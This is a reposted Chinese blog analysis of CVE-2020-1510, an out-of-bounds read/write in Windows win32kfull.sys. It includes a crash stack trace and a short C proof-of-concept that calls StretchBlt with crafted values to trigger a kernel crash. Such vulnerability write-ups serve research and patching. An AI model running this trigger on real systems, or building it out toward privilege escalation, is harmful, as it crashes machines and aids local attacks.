CVE-2020-1510漏洞分析

429 0 0

作者:网络

0x00漏洞信息

漏洞影响：本地提权

漏洞文件：win32kfull.sys

漏洞函数：pxrlStrRead01AND

漏洞原因：越界读写

分析系统：Windows 1903

0x01漏洞分析

崩溃时的堆栈：

nt!KeBugCheckEx+0x107
nt!MiSystemFault+0x1d3171
nt!MmAccessFault+0x34f
nt!KiPageFault+0x360
win32kfull!pxrlStrRead01AND+0x5b
win32kfull!EngStretchBltNew+0xdc9
win32kfull!EngStretchBlt+0xd1
win32kfull!EngStretchBltROP+0x157
win32kfull!BLTRECORD::bStretch+0x37e
win32kfull!GreStretchBltInternal+0x721
win32kfull!NtGdiStretchBlt+0x68

和CVE-2020-1247漏洞原因一样只是触发位置不一样

0x02验证poc

#include <Windows.h>


int main()
{
    HDC r0 = CreateCompatibleDC(0x0);
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x3, 0x1);
    SelectObject(r0, r1);
    HDC  r2 = GetWindowDC(0x0);
    StretchBlt(r0, 0x0, 0x0, 0x800, 0x1, r2, 0x0, 0x7, 0xffffffffffeffff4, 0xfffffffffffffff8, 0xcc001c);

    return 0;
}

要开启特殊池稳定触发

方法看

CVE-2020-1247漏洞分析

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/feizianquan/p/17160090.html

标签： Windows Windows操作系统 Win7

你还没有登录，请先登录或注册！

还没有人评论，欢迎说说您的想法！

CVE-2020-1510漏洞分析

CVE-2020-1510漏洞分析

0x00漏洞信息

0x01漏洞分析

0x02验证poc

CVE-2020-1247漏洞分析

热门标签

推荐文章